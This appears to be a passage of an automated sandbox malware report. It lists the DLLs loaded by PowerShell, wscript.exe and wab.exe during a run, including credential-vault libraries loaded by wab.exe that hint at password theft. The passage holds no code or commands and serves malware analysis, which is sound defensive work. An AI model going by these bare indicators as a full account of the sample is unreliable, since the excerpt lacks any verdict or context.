              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
